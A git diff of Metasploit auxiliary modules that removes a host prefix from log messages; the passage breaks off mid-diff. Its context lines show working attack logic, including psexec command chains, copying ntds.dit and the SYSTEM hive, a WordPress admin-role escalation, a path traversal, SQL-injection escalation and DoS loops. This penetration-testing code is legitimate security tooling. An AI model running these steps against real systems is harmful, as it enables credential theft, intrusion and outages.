diff --git a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb index 2fada64417..25c01c9f28 100644 --- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary def set_wp_option(name, value, cookie) encoded_value = serialize_and_encode(value) if encoded_value.nil? - vprint_error("#{peer} - Failed to serialize #{value}.") + vprint_error("Failed to serialize #{value}.") else res = send_request_cgi( 'method' => 'POST', @@ -87,9 +87,9 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? - vprint_error("#{peer} - No response from the target.") + vprint_error("No response from the target.") else - vprint_warning("#{peer} - Server responded with status code #{res.code}") if res.code != 200 + vprint_warning("Server responded with status code #{res.code}") if res.code != 200 end return res @@ -97,29 +97,29 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com" - print_status("#{peer} - Changing admin e-mail address to #{new_email}...") + print_status("Changing admin e-mail address to #{new_email}...") if set_wp_option('admin_email', new_email, cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to change the admin e-mail address') end - print_status("#{peer} - Enabling user registrations...") + print_status("Enabling user registrations...") if set_wp_option('users_can_register', 1, cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to enable user registrations') end - print_status("#{peer} - Setting the default user role...") + print_status("Setting the default user role...") if set_wp_option('default_role', 'administrator', cookie).nil? fail_with(Failure::UnexpectedReply, 'Failed to set the default user role') end register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register') - print_good("#{peer} - Privilege escalation complete") - print_good("#{peer} - Create a new account at #{register_url} to gain admin access.") + print_good("Privilege escalation complete") + print_good("Create a new account at #{register_url} to gain admin access.") end end diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 0ef51aa38a..170a40091e 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Attempting to connect and check endianess...") + print_status("Attempting to connect and check endianess...") @endianess = fingerprint_endian @credentials = {} @@ -72,18 +72,18 @@ class Metasploit3 < Msf::Auxiliary print_error("Failed to check endianess, aborting...") return end - print_good("#{peer} - #{string_endianess} device found...") + print_good("#{string_endianess} device found...") - print_status("#{peer} - Attempting to connect and dump configuration...") + print_status("Attempting to connect and dump configuration...") config = dump_configuration if config.nil? - print_status("#{peer} - Error retrieving configuration, aborting...") + print_status("Error retrieving configuration, aborting...") return end loot_file = store_loot("router.config", "text/plain", rhost, config[:data], "#{rhost}router_config.txt", "Router Configurations") - print_status("#{peer} - Router configuration dump stored in: #{loot_file}") + print_status("Router configuration dump stored in: #{loot_file}") parse_configuration(config[:data]) end @@ -175,7 +175,7 @@ class Metasploit3 < Msf::Auxiliary disconnect if res.blank? - vprint_error("#{peer} - No answer...") + vprint_error("No answer...") return end @@ -186,17 +186,17 @@ class Metasploit3 < Msf::Auxiliary end unless mark == 0x4d4d6353 - vprint_error("#{peer} - Incorrect mark when reading response") + vprint_error("Incorrect mark when reading response") return nil end unless zero == 0 - vprint_error("#{peer} - Incorrect zero when reading response") + vprint_error("Incorrect zero when reading response") return nil end unless length == data.length - vprint_warning("#{peer} - Inconsistent length / data packet") + vprint_warning("Inconsistent length / data packet") # return nil end @@ -222,7 +222,7 @@ class Metasploit3 < Msf::Auxiliary @credentials.each do |k,v| next unless v[:user] and v[:password] - print_status("#{peer} - #{k}: User: #{v[:user]} Pass: #{v[:password]}") + print_status("#{k}: User: #{v[:user]} Pass: #{v[:password]}") report_cred( ip: rhost, port: rport, @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Auxiliary SETTINGS['General'].each do |regex| if config.match(regex[1]) value = $1 - print_status("#{peer} - #{regex[0]}: #{value}") + print_status("#{regex[0]}: #{value}") end end end diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb index 83a8d2d1ec..dc6b36654f 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb @@ -39,49 +39,49 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Grabbing the SQL Server name and domain...") + print_status("Grabbing the SQL Server name and domain...") db_server_name = get_server_name if db_server_name.nil? - print_error("#{peer} - Unable to grab the server name") + print_error("Unable to grab the server name") return else - print_good("#{peer} - Server name: #{db_server_name}") + print_good("Server name: #{db_server_name}") end db_domain_name = get_domain_name if db_domain_name.nil? - print_error("#{peer} - Unable to grab domain name") + print_error("Unable to grab domain name") return end # Check if server is on a domain if db_server_name == db_domain_name - print_error("#{peer} - The SQL Server does not appear to be part of a Windows domain") + print_error("The SQL Server does not appear to be part of a Windows domain") return else - print_good("#{peer} - Domain name: #{db_domain_name}") + print_good("Domain name: #{db_domain_name}") end - print_status("#{peer} - Grabbing the SID for the domain...") + print_status("Grabbing the SID for the domain...") windows_domain_sid = get_windows_domain_sid(db_domain_name) if windows_domain_sid.nil? - print_error("#{peer} - Could not recover the SQL Server's domain sid.") + print_error("Could not recover the SQL Server's domain sid.") return else - print_good("#{peer} - Domain sid: #{windows_domain_sid}") + print_good("Domain sid: #{windows_domain_sid}") end # Get a list of windows users, groups, and computer accounts using SUSER_NAME() total_rids = datastore['END_RID'] - datastore['START_RID'] - print_status("#{peer} - Brute forcing #{total_rids} RIDs via SQL injection, be patient...") + print_status("Brute forcing #{total_rids} RIDs via SQL injection, be patient...") domain_users = get_win_domain_users(windows_domain_sid) if domain_users.nil? - print_error("#{peer} - Sorry, no Windows domain accounts were found, or DC could not be contacted.") + print_error("Sorry, no Windows domain accounts were found, or DC could not be contacted.") return end # Print number of objects found and write to a file - print_good("#{peer} - #{domain_users.length} user accounts, groups, and computer accounts were found.") + print_good("#{domain_users.length} user accounts, groups, and computer accounts were found.") # Create table for report windows_domain_login_table = Rex::Ui::Text::Table.new( @@ -179,7 +179,7 @@ class Metasploit3 < Msf::Auxiliary (datastore['START_RID']..datastore['END_RID']).each do |principal_id| rid_diff = principal_id - datastore['START_RID'] if principal_id % 100 == 0 - print_status("#{peer} - #{rid_diff} of #{total_rids } RID queries complete") + print_status("#{rid_diff} of #{total_rids } RID queries complete") end user_sid = build_user_sid(domain_sid, principal_id) @@ -198,7 +198,7 @@ class Metasploit3 < Msf::Auxiliary unless windows_login.empty? || windows_logins.include?(windows_login) windows_logins.push(windows_login) - print_good("#{peer} - #{windows_login}") + print_good(" #{windows_login}") end end diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb index 320c1850a6..95bc7a1694 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb @@ -30,62 +30,62 @@ class Metasploit3 < Msf::Auxiliary def run # Get the database user name - print_status("#{peer} - Grabbing the database user name from ...") + print_status("Grabbing the database user name from ...") db_user = get_username if db_user.nil? - print_error("#{peer} - Unable to grab user name...") + print_error("Unable to grab user name...") return else - print_good("#{peer} - Database user: #{db_user}") + print_good("Database user: #{db_user}") end # Grab sysadmin status - print_status("#{peer} - Checking if #{db_user} is already a sysadmin...") + print_status("Checking if #{db_user} is already a sysadmin...") admin_status = check_sysadmin if admin_status.nil? - print_error("#{peer} - Couldn't retrieve user status, aborting...") + print_error("Couldn't retrieve user status, aborting...") return elsif admin_status == '1' - print_error("#{peer} - #{db_user} is already a sysadmin, no esclation needed.") + print_error("#{db_user} is already a sysadmin, no esclation needed.") return else - print_good("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.") + print_good("#{db_user} is NOT a sysadmin, let's try to escalate privileges.") end # Check for trusted databases owned by sysadmins - print_status("#{peer} - Checking for trusted databases owned by sysadmins...") + print_status("Checking for trusted databases owned by sysadmins...") trust_db_list = check_trust_dbs if trust_db_list.nil? || trust_db_list.length == 0 - print_error("#{peer} - No databases owned by sysadmin were found flagged as trustworthy.") + print_error("No databases owned by sysadmin were found flagged as trustworthy.") return else # Display list of accessible databases to user - print_good("#{peer} - #{trust_db_list.length} affected database(s) were found:") + print_good("#{trust_db_list.length} affected database(s) were found:") trust_db_list.each do |db| print_status(" - #{db}") end end # Check if the user has the db_owner role in any of the databases - print_status("#{peer} - Checking if #{db_user} has the db_owner role in any of them...") + print_status("Checking if #{db_user} has the db_owner role in any of them...") owner_status = check_db_owner(trust_db_list) if owner_status.nil? - print_error("#{peer} - Fail buckets, the user doesn't have db_owner role anywhere.") + print_error("Fail buckets, the user doesn't have db_owner role anywhere.") return else - print_good("#{peer} - #{db_user} has the db_owner role on #{owner_status}.") + print_good("#{db_user} has the db_owner role on #{owner_status}.") end # Attempt to escalate to sysadmin - print_status("#{peer} - Attempting to add #{db_user} to sysadmin role...") + print_status("Attempting to add #{db_user} to sysadmin role...") escalate_privs(owner_status, db_user) admin_status = check_sysadmin if admin_status && admin_status == '1' - print_good("#{peer} - Success! #{db_user} is now a sysadmin!") + print_good("Success! #{db_user} is now a sysadmin!") else - print_error("#{peer} - Fail buckets, something went wrong.") + print_error("Fail buckets, something went wrong.") end end diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb index 346efa1109..9a4493717f 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb @@ -28,60 +28,60 @@ class Metasploit3 < Msf::Auxiliary def run # Get the database user name - print_status("#{peer} - Grabbing the database user name...") + print_status("Grabbing the database user name...") db_user = get_username if db_user.nil? - print_error("#{peer} - Unable to grab user name...") + print_error("Unable to grab user name...") return else - print_good("#{peer} - Database user: #{db_user}") + print_good("Database user: #{db_user}") end # Grab sysadmin status - print_status("#{peer} - Checking if #{db_user} is already a sysadmin...") + print_status("Checking if #{db_user} is already a sysadmin...") admin_status = check_sysadmin if admin_status.nil? - print_error("#{peer} - Couldn't retrieve user status, aborting...") + print_error("Couldn't retrieve user status, aborting...") return elsif admin_status == '1' - print_error("#{peer} - #{db_user} is already a sysadmin, no escalation needed.") + print_error("#{db_user} is already a sysadmin, no escalation needed.") return else - print_status("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.") + print_status("#{db_user} is NOT a sysadmin, let's try to escalate privileges.") end # Get list of users that can be impersonated - print_status("#{peer} - Enumerating a list of users that can be impersonated...") + print_status("Enumerating a list of users that can be impersonated...") imp_user_list = check_imp_users if imp_user_list.nil? || imp_user_list.empty? - print_error("#{peer} - Sorry, the current user doesnt have permissions to impersonate anyone.") + print_error("Sorry, the current user doesnt have permissions to impersonate anyone.") return else # Display list of users that can be impersonated - print_good("#{peer} - #{imp_user_list.length} users can be impersonated:") + print_good("#{imp_user_list.length} users can be impersonated:") imp_user_list.each do |dbuser| - print_status("#{peer} - #{dbuser}") + print_status(" #{dbuser}") end end # Check if any of the users that can be impersonated are sysadmins - print_status("#{peer} - Checking if any of them are sysadmins...") + print_status("Checking if any of them are sysadmins...") imp_user_sysadmin = check_imp_sysadmin(imp_user_list) if imp_user_sysadmin.nil? - print_error("#{peer} - Sorry, none of the users that can be impersonated are sysadmins.") + print_error("Sorry, none of the users that can be impersonated are sysadmins.") return end # Attempt to escalate to sysadmin - print_status("#{peer} - Attempting to impersonate #{imp_user_sysadmin}...") + print_status("Attempting to impersonate #{imp_user_sysadmin}...") escalate_privs(imp_user_sysadmin,db_user) admin_status = check_sysadmin if admin_status && admin_status == '1' - print_good("#{peer} - Success! #{db_user} is now a sysadmin!") + print_good("Success! #{db_user} is now a sysadmin!") else - print_error("#{peer} - Fail buckets, something went wrong.") + print_error("Fail buckets, something went wrong.") end end @@ -179,10 +179,10 @@ class Metasploit3 < Msf::Auxiliary # check if user is a sysadmin if parsed_result && parsed_result[0] == '1' - print_good("#{peer} - #{imp_user} is a sysadmin!") + print_good(" #{imp_user} is a sysadmin!") return imp_user else - print_status("#{peer} - #{imp_user} is NOT a sysadmin") + print_status(" #{imp_user} is NOT a sysadmin") end end diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 7e77949291..684d043437 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Exploiting sqli to extract users information...") + print_status("Exploiting sqli to extract users information...") mark = Rex::Text.rand_text_alpha(8 + rand(5)) rand = Rex::Text.rand_text_numeric(2) separator = Rex::Text.rand_text_alpha(5 + rand(5)) @@ -134,21 +134,21 @@ class Metasploit3 < Msf::Auxiliary data = do_sqli(injection, mark) if data.blank? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end @users = [] @plain_passwords = [] - print_status("#{peer} - Parsing extracted data...") + print_status("Parsing extracted data...") parse_users(data, mark, separator) if @users.empty? - print_error("#{peer} - Users not found") + print_error("Users not found") return else - print_good("#{peer} - #{@users.length} users found!") + print_good("#{@users.length} users found!") end users_table = Rex::Ui::Text::Table.new( diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 749b32d22e..77c3daa7f0 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary begin smb_login rescue Rex::Proto::SMB::Exceptions::Error => autherror - print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") + print_error("Unable to authenticate with given credentials: #{autherror}") return end res = execute_command(text, bat) @@ -96,31 +96,31 @@ class Metasploit3 < Msf::Auxiliary def execute_command(text, bat) # Try and execute the provided command execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}" - print_status("#{peer} - Executing the command...") + print_status("Executing the command...") begin return psexec(execute) rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => exec_command_error elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3) - print_error("#{peer} - Unable to execute specified command: #{exec_command_error}") + print_error("Unable to execute specified command: #{exec_command_error}") return false end end # Retrive output from command def get_output(file) - print_status("#{peer} - Getting the command output...") + print_status("Getting the command output...") output = smb_read_file(@smbshare, @ip, file) if output.nil? - print_error("#{peer} - Error getting command output. #{$!.class}. #{$!}.") + print_error("Error getting command output. #{$!.class}. #{$!}.") return end if output.empty? - print_status("#{peer} - Command finished with no output") + print_status("Command finished with no output") return end # Report output - print_good("#{peer} - Command completed successfuly!") + print_good("Command completed successfuly!") vprint_status("Output for \"#{datastore['COMMAND']}\":") vprint_line("#{output}") @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary fd = smb_open(file, 'rwo') fd.close rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror - print_status("#{peer} - Unable to get handle: #{accesserror}") + print_status("Unable to get handle: #{accesserror}") return false end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -155,19 +155,19 @@ class Metasploit3 < Msf::Auxiliary # Removes files created during execution. def cleanup_after(*files) simple.connect("\\\\#{@ip}\\#{@smbshare}") - print_status("#{peer} - Executing cleanup...") + print_status("Executing cleanup...") files.each do |file| begin smb_file_rm(file) rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror - print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") + print_error("Unable to cleanup #{file}. Error: #{cleanuperror}") end end left = files.collect{ |f| smb_file_exist?(f) } if left.any? - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") else - print_status("#{peer} - Cleanup was successful") + print_status("Cleanup was successful") end end diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index dc1fd03215..ed89e046a5 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -61,12 +61,12 @@ class Metasploit3 < Msf::Auxiliary begin smb_login rescue StandardError => autherror - print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") + print_error("Unable to authenticate with given credentials: #{autherror}") return end # If a VSC was specified then don't try and create one if datastore['VSCPATH'].length > 0 - print_status("#{peer} - Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") + print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") vscpath = datastore['VSCPATH'] else unless datastore['CREATE_NEW_VSC'] == true @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary download_ntds((datastore['WINPATH'] + "\\Temp\\ntds")) download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys")) else - print_error("#{peer} - Failed to find a volume shadow copy. Issuing cleanup command sequence.") + print_error("Failed to find a volume shadow copy. Issuing cleanup command sequence.") end end cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys") @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary # then creating a new one def check_vss(text, bat) begin - print_status("#{peer} - Checking if a Volume Shadow Copy exists already.") + print_status("Checking if a Volume Shadow Copy exists already.") prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy' command = "%COMSPEC% /C echo vssadmin list shadows ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" result = psexec(command) @@ -102,14 +102,14 @@ class Metasploit3 < Msf::Auxiliary vscs = [] data.each_line { |line| vscs << line if line.include?("GLOBALROOT") } if vscs.empty? - print_status("#{peer} - No VSC Found.") + print_status("No VSC Found.") return nil end vscpath = prepath + vscs[vscs.length - 1].to_s.split("ShadowCopy")[1].to_s.chomp - print_good("#{peer} - Volume Shadow Copy exists on #{vscpath}") + print_good("Volume Shadow Copy exists on #{vscpath}") return vscpath rescue StandardError => vsscheckerror - print_error("#{peer} - Unable to determine if VSS is enabled: #{vsscheckerror}") + print_error("Unable to determine if VSS is enabled: #{vsscheckerror}") return nil end end @@ -120,16 +120,16 @@ class Metasploit3 < Msf::Auxiliary begin #Try to create the shadow copy command = "%COMSPEC% /C echo #{createvsc} ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" - print_status("#{peer} - Creating Volume Shadow Copy") + print_status("Creating Volume Shadow Copy") out = psexec(command) #Get path to Volume Shadow Copy vscpath = get_vscpath(text) rescue StandardError => vscerror - print_error("#{peer} - Unable to create the Volume Shadow Copy: #{vscerror}") + print_error("Unable to create the Volume Shadow Copy: #{vscerror}") return nil end if vscpath - print_good("#{peer} - Volume Shadow Copy created on #{vscpath}") + print_good("Volume Shadow Copy created on #{vscpath}") return vscpath else return nil @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary end return true rescue StandardError => ntdscopyerror - print_error("#{peer} - Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}") + print_error("Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}") return false end end @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary # Checks if ntds.dit was copied to the Windows Temp directory def check_ntds(text) - print_status("#{peer} - Checking if NTDS.dit was copied.") + print_status("Checking if NTDS.dit was copied.") check = "%COMSPEC% /C dir \\#{datastore['WINPATH']}\\Temp\\ntds > #{text}" run = psexec(check) output = smb_read_file(@smbshare, @ip, text) @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y" return psexec(command) rescue StandardError => hiveerror - print_error("#{peer} - Unable to copy the SYSTEM hive file: #{hiveerror}") + print_error("Unable to copy the SYSTEM hive file: #{hiveerror}") return false end end @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Auxiliary # Download the ntds.dit copy to your attacking machine def download_ntds(file) - print_status("#{peer} - Downloading ntds.dit file") + print_status("Downloading ntds.dit file") begin # Try to download ntds.dit simple.connect("\\\\#{@ip}\\#{@smbshare}") @@ -190,9 +190,9 @@ class Metasploit3 < Msf::Auxiliary data = remotefile.read remotefile.close ntds_path = store_loot("psexec.ntdsgrab.ntds", "application/octet-stream", @ip, data, "ntds.dit") - print_good("#{peer} - ntds.dit stored at #{ntds_path}") + print_good("ntds.dit stored at #{ntds_path}") rescue StandardError => ntdsdownloaderror - print_error("#{peer} - Unable to downlaod ntds.dit: #{ntdsdownloaderror}") + print_error("Unable to downlaod ntds.dit: #{ntdsdownloaderror}") return ntdsdownloaderror end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary # Download the SYSTEM hive copy to your attacking machine def download_sys_hive(file) - print_status("#{peer} - Downloading SYSTEM hive file") + print_status("Downloading SYSTEM hive file") begin # Try to download SYSTEM hive simple.connect("\\\\#{@ip}\\#{@smbshare}") @@ -209,9 +209,9 @@ class Metasploit3 < Msf::Auxiliary data = remotefile.read remotefile.close hive_path = store_loot("psexec.ntdsgrab.hive", "application/octet-stream", @ip, data, "system-hive") - print_good("#{peer} - SYSTEM hive stored at #{hive_path}") + print_good("SYSTEM hive stored at #{hive_path}") rescue StandardError => sysdownloaderror - print_error("#{peer} - Unable to download SYSTEM hive: #{sysdownloaderror}") + print_error("Unable to download SYSTEM hive: #{sysdownloaderror}") return sysdownloaderror end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -229,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary end return prepath + vsc.split("ShadowCopy")[1].chomp rescue StandardError => vscpath_error - print_error("#{peer} - Could not determine the exact path to the VSC check your WINPATH") + print_error("Could not determine the exact path to the VSC check your WINPATH") return nil end end @@ -237,21 +237,21 @@ class Metasploit3 < Msf::Auxiliary # Removes files created during execution. def cleanup_after(*files) simple.connect("\\\\#{@ip}\\#{@smbshare}") - print_status("#{peer} - Executing cleanup...") + print_status("Executing cleanup...") files.each do |file| begin if smb_file_exist?(file) smb_file_rm(file) end rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror - print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") + print_error("Unable to cleanup #{file}. Error: #{cleanuperror}") end end left = files.collect{ |f| smb_file_exist?(f) } if left.any? - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") else - print_status("#{peer} - Cleanup was successful") + print_status("Cleanup was successful") end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") end diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 4381c2addd..77e2f3a893 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -71,17 +71,17 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 302 and res.get_cookies =~ /sid/ session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? - print_good "#{peer} - Authentication successful" + print_good "Authentication successful" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status("#{peer} - Attempting to retrieve #{datastore['RPATH']}...") + print_status("Attempting to retrieve #{datastore['RPATH']}...") traversal = "../" * datastore['DEPTH'] traversal << datastore['RPATH'] @@ -98,9 +98,9 @@ class Metasploit3 < Msf::Auxiliary loot = $1 f = ::File.basename(datastore['RPATH']) path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH']) - print_status("#{peer} - #{datastore['RPATH']} saved in #{path}") + print_status("#{datastore['RPATH']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file") + print_error("Failed to retrieve the file") return end diff --git a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb index 28542774fb..f40516c242 100644 --- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb +++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb @@ -67,7 +67,7 @@ class Metasploit4 < Msf::Auxiliary c.send_request(r) # Don't wait for a response rescue ::Rex::ConnectionError => exception - print_error("#{peer} - Unable to connect: '#{exception.message}'") + print_error("Unable to connect: '#{exception.message}'") return ensure disconnect(c) if c diff --git a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb index e935e91cc2..cdc449f22d 100644 --- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb +++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb @@ -56,27 +56,27 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi('method' => 'GET', 'uri' => '/') unless res - print_error("#{peer} - No answer from the BigIP server") + print_error("No answer from the BigIP server") return end # Simple test based on HTTP Server header to detect BigIP virtual server server = res.headers['Server'] unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack - print_error("#{peer} - BigIP virtual server was not detected. Please check options") + print_error("BigIP virtual server was not detected. Please check options") return end - print_status("#{peer} - Starting DoS attack") + print_status("Starting DoS attack") # Start attack limit.times do |step| if step % 100 == 0 - print_status("#{peer} - #{step * 100 / limit}% accomplished...") + print_status("#{step * 100 / limit}% accomplished...") end res = send_request_cgi('method' => 'GET', 'uri' => '/') if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/ - print_good("#{peer} - DoS accomplished: The maximum number of concurrent user sessions has been reached.") + print_good("DoS accomplished: The maximum number of concurrent user sessions has been reached.") return end end @@ -84,18 +84,18 @@ class Metasploit3 < Msf::Auxiliary # Check if attack has failed res = send_request_cgi('method' => 'GET', 'uri' => uri) if res.headers['Location'] =~ /\/my.policy/ - print_error("#{peer} - DoS attack failed. Try to increase the RLIMIT") + print_error("DoS attack failed. Try to increase the RLIMIT") else - print_status("#{peer} - Result is undefined. Try to manually determine DoS attack result") + print_status("Result is undefined. Try to manually determine DoS attack result") end rescue ::Errno::ECONNRESET - print_error("#{peer} - The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached") + print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached") rescue ::Rex::ConnectionRefused - print_error("#{peer} - Unable to connect to BigIP") + print_error("Unable to connect to BigIP") rescue ::Rex::ConnectionTimeout - print_error("#{peer} - Unable to connect to BigIP. Please check options") + print_error("Unable to connect to BigIP. Please check options") rescue ::OpenSSL::SSL::SSLError - print_error("#{peer} - SSL/TLS connection error") + print_error("SSL/TLS connection error") end end diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index b69b8872f1..165a9d582e 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary if check_host(ip) == Exploit::CheckCode::Vulnerable dos_host(ip) else - print_status("#{peer} - Probably not vulnerable, will not dos it.") + print_status("Probably not vulnerable, will not dos it.") end end @@ -72,17 +72,17 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw('uri' => uri) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return file_size end if res.code == 404 - vprint_error("#{peer} - You got a 404. URI must be a valid resource.") + vprint_error("You got a 404. URI must be a valid resource.") return file_size end file_size = res.body.length - vprint_status("#{peer} - File length: #{file_size} bytes") + vprint_status("File length: #{file_size} bytes") return file_size }.call @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Errno::EPIPE, ::Timeout::Error # Same exceptions the HttpClient mixin catches end - print_status("#{peer} - DOS request sent") + print_status("DOS request sent") end def potential_static_files_uris diff --git a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb b/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb index efb942abe9..cca21add81 100644 --- a/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb +++ 